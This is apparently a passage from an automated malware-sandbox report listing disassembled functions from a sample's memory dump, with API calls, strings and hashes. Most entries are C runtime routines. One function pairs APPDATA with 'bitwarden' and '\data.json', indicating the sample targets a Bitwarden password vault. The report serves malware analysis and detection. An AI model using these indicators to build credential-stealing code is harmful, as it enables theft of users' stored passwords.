API String ID: 2160870905-3678202009
Opcode ID: d69b7b8e4d3c1399711f59cec0b43d6cd728137a1a91999bddc0885e12ea0f04
Instruction ID: 9b3f3817572477448480a2a61f95d1b37b37a47cebee998536b020df3066f960
Opcode Fuzzy Hash: d69b7b8e4d3c1399711f59cec0b43d6cd728137a1a91999bddc0885e12ea0f04
Instruction Fuzzy Hash: 02112331780224BAC719EEB9FC4AEFF36346B61706BA4464FB011215C9D66D5B8EC32D

Uniqueness

Uniqueness Score: -1.00%

Function 00456636, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00444819,00000000,00000000), ref: 0045667E
__fassign.LIBCMT ref: 0045685D
__fassign.LIBCMT ref: 0045687A
WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004568C2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00456902
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004569AE

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 7f0d55b9359026f402d2209b805b37988a3627087d3947fb05e8a6854c4c42bd
Instruction ID: 1c9c2276df55d3886d7d2513bb5e5d9cbe12e7e9eb6b7bddf9f4856738b3a87f
Opcode Fuzzy Hash: 7f0d55b9359026f402d2209b805b37988a3627087d3947fb05e8a6854c4c42bd
Instruction Fuzzy Hash: EFD1BAB5D002589FCF15CFA8C8809EDBBB5BF48305F29016EE855FB352D634A94ACB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045287B, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 375COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00452961
__freea.LIBCMT ref: 00452A01
__freea.LIBCMT ref: 00452A1D

Strings

am/pm, xrefs: 00452A81
a/p, xrefs: 00452AE5

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: 0fc761cefed52f8851c28673303a3bae8b3a39d9ab627a01fac0e0b694931be9
Instruction ID: 84ff8c8f9df91ff521f241915c616749b6a22e91f0ec38822e672e834ae8510f
Opcode Fuzzy Hash: 0fc761cefed52f8851c28673303a3bae8b3a39d9ab627a01fac0e0b694931be9
Instruction Fuzzy Hash: 72C1A1719002169ACB258F68C689ABF7770FF07702F28415BEC01AB357D3B99D4ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044260A, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00442601,00442016,0043FDB5), ref: 00442618
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00442626
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044263F
SetLastError.KERNEL32(00000000,00442601,00442016,0043FDB5), ref: 00442691

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 18fe716cef8726263608c5f09bfe508ff62f302f128da8e7299fe9e8289e34e3
Instruction ID: ad52c21b7f41d60464ee19c328da3714ffcc3c1c81a635c4f142785e3f4873b3
Opcode Fuzzy Hash: 18fe716cef8726263608c5f09bfe508ff62f302f128da8e7299fe9e8289e34e3
Instruction Fuzzy Hash: 53012B7210E7126EB7246BB97D8662B2B94EB02BB9732033FF510552F1EFDA4C02524D

Uniqueness

Uniqueness Score: -1.00%

Function 00434F8B, Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00434F95
_strlen.LIBCMT ref: 00434FAA
_strcat.LIBCMT ref: 00434FCD
_strlen.LIBCMT ref: 00434FD3
_strcat.LIBCMT ref: 00434FE7
_strlen.LIBCMT ref: 00434FED

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen$_strcat
String ID:
API String ID: 1497175149-0
Opcode ID: 63821296fdc4f31ac9c3ab6e2676cb69a944e98897ea3f3eeac45c32c3bd38b5
Instruction ID: dc77bb290adad650f1bb593c5586a5812d69f8e65b5ecfd2f146752cada4fe52
Opcode Fuzzy Hash: 63821296fdc4f31ac9c3ab6e2676cb69a944e98897ea3f3eeac45c32c3bd38b5
Instruction Fuzzy Hash: 2601C076500204BBEF14EF59CC81C9A7368DE8C318B15442EF80897202DB39EA0587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00412BD8, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412BDD
std::_Lockit::_Lockit.LIBCPMT ref: 00412BEB
int.LIBCPMT ref: 00412C02

Part of subcall function 004095B3: std::_Lockit::_Lockit.LIBCPMT ref: 004095C4
Part of subcall function 004095B3: std::_Lockit::~_Lockit.LIBCPMT ref: 004095DE

std::_Facet_Register.LIBCPMT ref: 00412C3C
std::_Lockit::~_Lockit.LIBCPMT ref: 00412C52
Concurrency::cancel_current_task.LIBCPMT ref: 00412C67

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: e9532859189215590155fe9bcf66383acc2af58bf6b589946606b6c5e63b1e22
Instruction ID: 7f9fa5811aca951dc981c0b2c80feed09a82350adfa3b40bea4f14039d2e0f4e
Opcode Fuzzy Hash: e9532859189215590155fe9bcf66383acc2af58bf6b589946606b6c5e63b1e22
Instruction Fuzzy Hash: 8111C231901115ABCB15AB95C909AAE7764EB44718F10452FE510B73C1EBB89D41CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0045E8DE, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0045E92C
_free.LIBCMT ref: 0045EA78

Strings

*?, xrefs: 0045E921

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 50154723c2dcc1a904ecf113c70d9d7728f0ea6cdb373f7c1ae03190924419d9
Instruction ID: d6f7977a57f779e6e330a36c6482b5e9e36a06d5b37c1720db41184861b0089e
Opcode Fuzzy Hash: 50154723c2dcc1a904ecf113c70d9d7728f0ea6cdb373f7c1ae03190924419d9
Instruction Fuzzy Hash: E0616EB1D002199FCF18CFAAC8815EEFBF5FF48315B14816AE805E7301E639AE458B94

Uniqueness

Uniqueness Score: -1.00%

Function 00446055, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004460F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004461EB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00446200

Strings

*`D, xrefs: 004461F6
*`D, xrefs: 004460C1, 004461BC

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: *`D$*`D
API String ID: 885266447-1574984974
Opcode ID: 05f175f2299d8f2c7b925a8b7cff33aba843e7a23b289ed7ce11cf5511a91975
Instruction ID: e1349bb4c03cc279c1e820a300bd96a9478d2337c926805aaae86febdf4bfb57
Opcode Fuzzy Hash: 05f175f2299d8f2c7b925a8b7cff33aba843e7a23b289ed7ce11cf5511a91975
Instruction Fuzzy Hash: 1B51F671A00209AFEF14CF58CC91AAFBBB2EF4A310F15805AE915A7352D739DD41CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0042A8AE, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A8B3

Strings

@YE+, xrefs: 0042AA84
PVT, xrefs: 0042AB02
vQJW, xrefs: 0042A94F
bE^C, xrefs: 0042AAFB

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: @YE+$PVT$bE^C$vQJW
API String ID: 3519838083-1976080639
Opcode ID: ef4f388a9290d7ed98102334590023f6ca2c2baf6910f7e0fcc36e9c4b858d47
Instruction ID: 6837f21f9668861b88a64c36eb7b65311972523db4160ec8324b278fbe13edd0
Opcode Fuzzy Hash: ef4f388a9290d7ed98102334590023f6ca2c2baf6910f7e0fcc36e9c4b858d47
Instruction Fuzzy Hash: D3915A70C0529CDADB05DFE4D6912ECFBB0BF29308F50516ED84537252EBB81A89CB19

Uniqueness

Uniqueness Score: -1.00%

Function 0041AB1E, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 107COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041AB23

Part of subcall function 0043481D: __EH_prolog.LIBCMT ref: 00434822
Part of subcall function 0043481D: _strcat.LIBCMT ref: 0043487D

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

Part of subcall function 00434CBE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434D0A

Part of subcall function 0040B6A1: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00486F70,00000000,00000000,?,?,0041AE02,?), ref: 0040B6B5
Part of subcall function 0040B6A1: CreateDirectoryTransactedA.KERNEL32 ref: 0040B6CE
Part of subcall function 0040B6A1: CommitTransaction.KTMW32(00000000,?,0041AE02,?), ref: 0040B6D9

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Strings

APPDATA, xrefs: 0041AB2F, 0041AB5F
poH, xrefs: 0041AB3A
bitwarden, xrefs: 0041AB48
\data.json, xrefs: 0041AB4D

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateDeallocateH_prologTransaction$CommitDirectoryEnvironmentTransactedVariable_strcat
String ID: APPDATA$\data.json$bitwarden$poH
API String ID: 178285706-346670032
Opcode ID: fb006cc434cd565008dea7d32a02bda777f6d6ce67e81bb353e2c02e2cb4b4e9
Instruction ID: ba5daf8d6cef63f329465329a1cf8841c211efb7a937efc48d4005479221877a
Opcode Fuzzy Hash: fb006cc434cd565008dea7d32a02bda777f6d6ce67e81bb353e2c02e2cb4b4e9
Instruction Fuzzy Hash: 3841C331D00208DFCF05EBE5D8516DDBBB1AF98318F10442FE11577282DB786A89CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045E386, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0045E408
_free.LIBCMT ref: 0045E42C
_free.LIBCMT ref: 0045E5B9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004711C0), ref: 0045E5CB
_free.LIBCMT ref: 0045E785

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 9bcd9865eaa9747572982adbbdf8a8f70f14ebf3625f67caaf13160eb06c0d87
Instruction ID: cf1f63bc1eaa4ec7b4e937267f02f2841d9b0dc1a19bf7e21f734679eed480ba
Opcode Fuzzy Hash: 9bcd9865eaa9747572982adbbdf8a8f70f14ebf3625f67caaf13160eb06c0d87
Instruction Fuzzy Hash: 9AC13771900204AFDB299F6A88516AF7BA8EF56355F1400AFEC9497383E7388F09C758

Uniqueness

Uniqueness Score: -1.00%

Function 00462962, Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00462C1E,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00462A05
__alloca_probe_16.LIBCMT ref: 00462ABB
__alloca_probe_16.LIBCMT ref: 00462B51
__freea.LIBCMT ref: 00462BBC
__freea.LIBCMT ref: 00462BC8

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 5bdbfe52f034647a34308db8fd586a3f23cfe60a6a7c8e35d33909e5c596d081
Instruction ID: 607ef07e4af2ed2a2ec13ecf386d73f776e3fb3df26556c99bed5534596b4b04
Opcode Fuzzy Hash: 5bdbfe52f034647a34308db8fd586a3f23cfe60a6a7c8e35d33909e5c596d081
Instruction Fuzzy Hash: 6F81E271E00A06BBDF208E958A41EEF7BB5EF09754F18005BE800A7251E6ADDD44C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004549AA, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 00458230: RtlAllocateHeap.NTDLL(00000000,0043E6C3,00000000,?,0044058B,00000002,00000000,?,?,?,00408EE6,0043E6C3,00000004,00000000,00000000,00000000), ref: 00458262

_free.LIBCMT ref: 00454AB9
_free.LIBCMT ref: 00454AD0
_free.LIBCMT ref: 00454AED
_free.LIBCMT ref: 00454B08
_free.LIBCMT ref: 00454B1F

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 0c7b4070398b1b1985953c57c64bbae2f4b143ae693bb43748e93f557f934850
Instruction ID: e865385b26c308bc00db429f87ed37670cd28d4627fa9515af3949ab37070d83
Opcode Fuzzy Hash: 0c7b4070398b1b1985953c57c64bbae2f4b143ae693bb43748e93f557f934850
Instruction Fuzzy Hash: FA51B531A402049FDB20DF69C841B6B77F4FF8472AB14456EE809DB252E739ED45CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0043CEF0, Relevance: 7.6, APIs: 5, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,00000000), ref: 0043CF38
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,00000000), ref: 0043CF69
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0043CECF,00000000,00000000), ref: 0043CF98
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0043CECF), ref: 0043CFA6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043CFD8

Part of subcall function 0043CA57: GetFileInformationByHandle.KERNEL32(?,?), ref: 0043CA6B

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 89576305-0
Opcode ID: 4f9537a2c51e2f6372c788cd7980cf01b6846a28a76bc706b5a9a8f72ca866af
Instruction ID: 4af4f27f21aeda8b4815e53ec019c2df3a2a5180ea3d92fd489e062169a92b53
Opcode Fuzzy Hash: 4f9537a2c51e2f6372c788cd7980cf01b6846a28a76bc706b5a9a8f72ca866af
Instruction Fuzzy Hash: 17316171900B04AFD725CF69D884AABBBF8FF48308F00492EE596D2650E774A944CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00460269, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00460281

Part of subcall function 00457085: HeapFree.KERNEL32(00000000,00000000,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?), ref: 0045709B
Part of subcall function 00457085: GetLastError.KERNEL32(?,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?,?), ref: 004570AD

_free.LIBCMT ref: 00460293
_free.LIBCMT ref: 004602A5
_free.LIBCMT ref: 004602B7
_free.LIBCMT ref: 004602C9

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b3e9779b6ffb6c3f0a21c00bd761656ac1a2759e87ceb499e147c71e594d3e85
Instruction ID: 85243f43e22f2b3db1a077e3afa69e8fa36fbd526325bb42f968f78e3e49644c
Opcode Fuzzy Hash: b3e9779b6ffb6c3f0a21c00bd761656ac1a2759e87ceb499e147c71e594d3e85
Instruction Fuzzy Hash: 75F04F72504200AB86A4EB6AF49EC1B73E9AE80B127650D5EF848D7643DB2CFC80875C

Uniqueness

Uniqueness Score: -1.00%

Function 0045A710, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0045A797

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 201a30e026bf1f83967d2e6a26cbaaa7bb5179f29d21ebc2bb88042a144ada7f
Instruction ID: 304b289752606926c55e247b59e46dcbc0dc374fcc0e0fd518e6907ca895a874
Opcode Fuzzy Hash: 201a30e026bf1f83967d2e6a26cbaaa7bb5179f29d21ebc2bb88042a144ada7f
Instruction Fuzzy Hash: 2AB146719002959FDB11CF28C8417AEBBE5EF55305F25866BEC409B343E63C8D1ACB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00442721, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004427E8
___AdjustPointer.LIBCMT ref: 0044280B
___AdjustPointer.LIBCMT ref: 004428A7

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 7b01fc8cb69f0dde3f5482d7ef294a58b3d6f4819dcb0cae33a7bef1fd9cbb24
Instruction ID: add71409517eb0f32460f32f35eb128f1b29318854abbd3a66dcddce8d991e23
Opcode Fuzzy Hash: 7b01fc8cb69f0dde3f5482d7ef294a58b3d6f4819dcb0cae33a7bef1fd9cbb24
Instruction Fuzzy Hash: A351E371A00602AFFB29AF51CA41B7EB7A4EF04714F54462FF801472A1E7B9EC81C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6F6, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000030,00000006,0040C774,?,?,?,?), ref: 0040C483
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000030,00000006,0040C774,?,?,?,?,?,?), ref: 0040C48A

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Strings

/&70, xrefs: 0040C5A5
BK_, xrefs: 0040C500

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$DeallocateFreeProcess
String ID: /&70$BK_
API String ID: 178602400-3847264202
Opcode ID: a3f3a8c6753e128375c501d67c6682054f0d6ee4d151292bb43b8c905ec1fb33
Instruction ID: 1cd1b911be2f773edf1943396bdc15380aabfdbe608885916c5adacb010b40b8
Opcode Fuzzy Hash: a3f3a8c6753e128375c501d67c6682054f0d6ee4d151292bb43b8c905ec1fb33
Instruction Fuzzy Hash: E651D571D00168DADF24DBA4CD95BEEB7B4AF05304F1042AEE159B3191EB741B84CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0045086F, Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9418842988a6f161f0bef54eaa84076bef06808804b63bd64930c5597d69990e
Instruction ID: b1b961cc1a73fb246cbc463fa90c5cc02b7d414f32c1e6ec063efefb80baf863
Opcode Fuzzy Hash: 9418842988a6f161f0bef54eaa84076bef06808804b63bd64930c5597d69990e
Instruction Fuzzy Hash: 324128B6A00304AFE724AF79CC01B9EBBA9EB44715F10852FF815DB382D779E9448784

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF36, Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

___std_fs_open_handle@16.LIBCPMT ref: 0040AF5A
___std_fs_read_reparse_data_buffer@12.LIBCPMT ref: 0040AF94

Part of subcall function 0043E45D: DeviceIoControl.KERNEL32 ref: 0043E478
Part of subcall function 0043E45D: GetLastError.KERNEL32(?,0040AF99,?,00000000,00004002,?,?,00000080,02200000,?,?), ref: 0043E482

___std_fs_get_file_attributes_by_handle@8.LIBCPMT ref: 0040AFC0

Part of subcall function 0043DCF5: CloseHandle.KERNEL32(000000FF,?,0043E3BD,?,?,?,00000080,?), ref: 0043DD01

___std_fs_read_name_from_reparse_data_buffer@12.LIBCPMT ref: 0040AFFB

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseControlDeviceErrorHandleLast___std_fs_get_file_attributes_by_handle@8___std_fs_open_handle@16___std_fs_read_name_from_reparse_data_buffer@12___std_fs_read_reparse_data_buffer@12
String ID:
API String ID: 719998554-0
Opcode ID: 6a6e6b871b71c582f69187ccf76d214c69634eece568bc8947fa33b64efe8506
Instruction ID: 4235b081cf4921cf987adaf910fe7bdbbb833a0651ee034c55c505cd01c77387
Opcode Fuzzy Hash: 6a6e6b871b71c582f69187ccf76d214c69634eece568bc8947fa33b64efe8506
Instruction Fuzzy Hash: 3B31F671D01219BACB11ABA6DC819AFB7B9EF09304F10007BF911B62C2DB79DE01979D

Uniqueness

Uniqueness Score: -1.00%

Function 0045E80F, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00450624: _free.LIBCMT ref: 00450632

Part of subcall function 00459C34: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0045BC6D,?,00000000,00000000), ref: 00459CD6

GetLastError.KERNEL32 ref: 0045E877
__dosmaperr.LIBCMT ref: 0045E87E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0045E8BD
__dosmaperr.LIBCMT ref: 0045E8C4

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 886f691e0ff38a21715e80a9774d0107f3a0ab2960d61692e7fb4ce6e6cd53f7
Instruction ID: 01fb6cf68ae88ed3c9bb3250d0e8a5199477d677ecc06952b3f838c0cd12f307
Opcode Fuzzy Hash: 886f691e0ff38a21715e80a9774d0107f3a0ab2960d61692e7fb4ce6e6cd53f7
Instruction Fuzzy Hash: D621D671600205BFDB24BFA78D8092B77ACEF0036A710853AFD2597242DB38ED558B99

Uniqueness

Uniqueness Score: -1.00%

Function 00450523, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e5c68e81957f3b7ea39266aab928d618287e1ee8eb888abb7dad63dbfe7fa49
Instruction ID: 15432422b21fd1fbdba72128c802a379cafae0224fefa7915c7e408a8c84ae95
Opcode Fuzzy Hash: 8e5c68e81957f3b7ea39266aab928d618287e1ee8eb888abb7dad63dbfe7fa49
Instruction Fuzzy Hash: EA21F27520010DBF9B20EFA28C8096F779CAF003AA710451AFD5497242FB38EC55CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00434A6F, Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,751469A0,?,?), ref: 00434AA0
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,?), ref: 00434ABF
lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,?), ref: 00434AE2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0), ref: 00434B0E

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$lstrcpylstrlen
String ID:
API String ID: 3705784190-0
Opcode ID: 06f9af7f8b8afdfb6680e1c9ee5550341f3685def94e1336784fc9930ba1e119
Instruction ID: 0857c4044061250782436c4d70f8f0b14196f7af25c5f9f82ed8def6c124ed67
Opcode Fuzzy Hash: 06f9af7f8b8afdfb6680e1c9ee5550341f3685def94e1336784fc9930ba1e119
Instruction Fuzzy Hash: 85216575900205FFEB159F64CC09ABABAB9EF48301F14446EF441D6251EAB4AD40DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0045626B, Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00451585,00483AF0,00000008,0043E09B,?,00413D61,?,7FFFFFFF,?,00000000,00413A66), ref: 00456270
_free.LIBCMT ref: 004562CD
_free.LIBCMT ref: 00456303
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,00451585,00483AF0,00000008,0043E09B,?,00413D61,?,7FFFFFFF,?,00000000), ref: 0045630E

Memory Dump Source

Source File: 00000016.00000002.565684394.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.585917097.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: aef611f8bd6bb5cc183a77233fe7d7dc9e038b3245b4410a321c9d6a2a8a2d93
Instruction ID: 7c51a4dc5afe4908b99bbb1900984201c12c7bc849635e8cefa8a96587aeaf51
Opcode Fuzzy Hash: aef611f8bd6bb5cc183a77233fe7d7dc9e038b3245b4410a321c9d6a2a8a2d93
Instruction Fuzzy Hash: B211EB712082012BD61136B5BC85D2F26998BC077FB6606BFFD24571E3DA6D9C4E421D

Uniqueness

Uniqueness Score: -1.00%

Function 004380FD, Relevance: 6.1, APIs: 4, Instructions: 71processCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00438132
CreateProcessA.KERNEL32 ref: 004381BD
CloseHandle.KERNEL32(?), ref: 004381C6
CloseHandle.KERNEL32(?), ref: 004381CF

Memory Dump Source

